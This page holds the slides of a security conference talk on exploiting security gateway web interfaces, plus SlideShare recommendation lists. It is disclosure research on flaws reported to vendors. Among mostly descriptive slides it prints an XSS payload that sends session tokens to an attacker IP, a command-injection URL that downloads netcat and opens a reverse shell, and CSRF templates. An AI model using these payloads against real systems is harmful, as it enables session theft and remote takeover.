SlideShare uma empresa Scribd logo

They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

M
michelemanzotti
Tecnologia
1 de 41
Baixar para ler offline
They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
Introduction §  35+ Exploits found and reported to vendors of Security Gateways since October 2011 §  Many are serious issues which can lead an external attacker to compromise the Gateway §  Owning the Gateway can be quick, and powerful… as I will show you…
Which kind of products? §  Security Gateways -  Multifunction Security Gateways -  Email and Web filtering §  Appliances and Software §  Some examples include: -  ClearOS, Untangle, McAfee, Proofpoint, Barracuda -  Websense, Symantec (Brightmail)
How are they deployed?
What do they look like? Screenshots removed for slides
My Exploit Research method §  Find vendor site, sign-up §  Download product evaluation -  get eval-key (30 days) §  Install VM and snapshot §  “Blast it” with automated scanners §  Prod and poke it with Burp -  (majority of time) §  SSH as root for whitebox testing §  Create/test exploits §  Log and report exploits
Common vulnerabilities found §  Input-validation issues (90% of products) -  XSS, command-injection, SQLi, parameter-tampering §  Predictable URLs & parameters = CSRF §  Excessive privileges §  Various session-management issues §  Authentication bypass and information- disclosure §  Out-of-date software, default configs/ content §  Brute force password guessing -  (too basic but lots of it)
Attack stages §  Phase one: -  Gaining access to the UI §  Phase two: -  Gaining access to the operating- system
Interesting examples 1 §  ClearOS -  Information disclosure
Video removed for slides
Video removed for slides
Recap – UI ownage
Video removed for slides
Recap – Root shell and pivoting
Post exploitation §  It’s common for useful tools to be already installed -  gcc -  tcpdump -  netcat -  Nmap -  Perl/Python -  yum/apt-get -  stunnel §  File-system frequently not “hardened” -  No SELinux
Other session-token disclosure Screenshots removed for slides
More session-tokens – bypassing cookie security §  Bypass cookie security flags (Http-Only) §  Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= "http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + """)'>
Attack scenarios §  Direct access to the Security Gateway UI -  Auth-bypass, session-hijacking, information-disclosure §  No direct access to the UI -  CSRF, XSS -  (Requires reconnaissance, and interaction with users) -  Special case of CSRF -  OSRF with out-of-band XSS
CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
CSRFing Corporate Security Gateways Attacker Victim
Interesting examples 2 §  Websense -  Unauthenticated command-injection as SYSTEM -  Advanced CSRF
Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo  .pdf%26echo  strUrl  %3d  ^"http:^"  %2b   chr(47)  %2b  chr(47)  %2b  ^"192.168.233.11^"  %2b  chr(47)  %2b  ^"nc.exe^">  http.vbs %26echo  StrFile  %3d  ^"nc.exe^"  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DEFAULT  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PRECONFIG  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DIRECT  %3d  1  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PROXY  %3d  2  >>  http.vbs%26echo  Dim  http,  varByteArray,   strData,  strBuffer,  lngCounter,  fs,  ts  >>  http.vbs%26echo      Err.Clear  >>  http.vbs %26echo      Set  http  %3d  Nothing  >>  http.vbs%26echo      Set  http  %3d   CreateObject(^"WinHttp.WinHttpRequest.5.1^")  >>  http.vbs%26echo      If  http  Is   Nothing  Then  Set  http  %3d  CreateObject(^"WinHttp.WinHttpRequest^")  >>  http.vbs %26echo      If  http  Is  Nothing  Then  Set  http  %3d   CreateObject(^"MSXML2.ServerXMLHTTP^")  >>  http.vbs%26echo      If  http  Is  Nothing   Then  Set  http  %3d  CreateObject(^"Microsoft.XMLHTTP^")  >>  http.vbs%26echo       http.Open  ^"GET^",  strURL,  False  >>  http.vbs%26echo      http.Send  >>  http.vbs%26echo     varByteArray  %3d  http.ResponseBody  >>  http.vbs%26echo      Set  http  %3d  Nothing  >>   http.vbs%26echo      Set  fs  %3d  CreateObject(^"Scripting.FileSystemObject^")  >>   http.vbs%26echo      Set  ts  %3d  fs.CreateTextFile(StrFile,  True)  >>  http.vbs%26echo       strData  %3d  ^"^"  >>  http.vbs%26echo      strBuffer  %3d  ^"^"  >>  http.vbs%26echo      For   lngCounter  %3d  0  to  UBound(varByteArray)  >>  http.vbs%26echo              ts.Write  Chr(255   And  Ascb(Midb(varByteArray,lngCounter  %2b  1,  1)))  >>  http.vbs%26echo      Next  >>   http.vbs%26echo      ts.Close  >>  http.vbs%26http.vbs%26nc.exe  192.168.233.11  443  -­‐e   cmd.exe|  
But how to exploit it?
Problems with CSRFing internal products from outside §  Who is the admin? §  How do you get the admin to click something malicious whilst logged- in? §  Product-UI port locked down to specific users? §  Don’t know internal IP address of the product in advance?
Ways to find DMZ IP addresses §  From SMTP relays bounced messages §  Misconfigured Web servers
CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...
Use the browser (and proxy)
There’s no place like localhost §  127.0.0.1 §  127.0.0.2 §  There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost
CSRF proxy attack
Proxy-killer <html> <img src= http://127.0.0.2:xxxx/...etc... </html>
Did you understand that?
Interesting examples 3 §  Proofpoint  (video/demo)   -­‐  Enumerate  email  addresses -­‐  OSRF  via  email  
Video removed for slides
Video removed for slides
Video removed for slides
Recap – UI ownage via OSRF
Spot the problem
Conclusion §  Exploiting Security Gateway products offers powerful positions for an attacker §  Wide range of issues, some very serious -  Some easy to find, some harder §  Most techniques used are several years old §  I feel there is a big knowledge gap between secure website development and secure UI development
Further research §  This is a rich area for exploit- development -  35+ Exploits found so far in Security Gateways (just takes time) -  Lots of similar products vulnerable to similar attacks §  Other types of product -  Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far -  I’ve started looking at SSL VPNs
Questions and suggestions §  Whitepaper available at BlackHat EU §  Company Website: http://www.ngssecure.com §  Personal Blog: http://insidetrust.blogspot.com §  QUESTIONS?

Recomendados

In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
kosborn
 

Recomendados

In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
Jakub Kałużny
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
SecuRing
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
kosborn
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat Security Conference
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
drewz lin
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
End to end web security
End to end web securityEnd to end web security
End to end web security
George Boobyer
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky servers
Axilis
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
Yan Cui
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
nyccamp
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
drewz lin
 
WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
lpilorz
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
Mike Saunders
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
michelemanzotti
 

Mais conteúdo relacionado

Mais procurados

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
drewz lin
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat Security Conference
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
drewz lin
 
End to end web security
End to end web securityEnd to end web security
End to end web security
George Boobyer
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
Yan Cui
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
drewz lin
 

Mais procurados (20)

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
 
Csrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equalCsrf not-all-defenses-are-created-equal
Csrf not-all-defenses-are-created-equal
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
End to end web security
End to end web securityEnd to end web security
End to end web security
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky servers
 
Serverless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark ArtsServerless Security: Defence Against the Dark Arts
Serverless Security: Defence Against the Dark Arts
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
WebView security on iOS (EN)
WebView security on iOS (EN)WebView security on iOS (EN)
WebView security on iOS (EN)
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 

Destaque

Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
michelemanzotti
 
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
DefconRussia
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
michelemanzotti
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
michelemanzotti
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun
michelemanzotti
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
michelemanzotti
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
michelemanzotti
 

Destaque (9)

Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
 
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
Mateusz 'j00ru' Jurczyk - Windows Kernel Trap Handler and NTVDM Vulnerabiliti...
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
 

Semelhante a They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
jaxconf
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 

Semelhante a They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
1.3. (In)security Software
1.3. (In)security Software1.3. (In)security Software
1.3. (In)security Software
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Hacking identity: A Pen Tester's Guide to IAM
Hacking identity: A Pen Tester's Guide to IAMHacking identity: A Pen Tester's Guide to IAM
Hacking identity: A Pen Tester's Guide to IAM
 
DevSecOps - automating security
DevSecOps - automating securityDevSecOps - automating security
DevSecOps - automating security
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
Day8
Day8Day8
Day8
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 

Último

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Último (20)

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
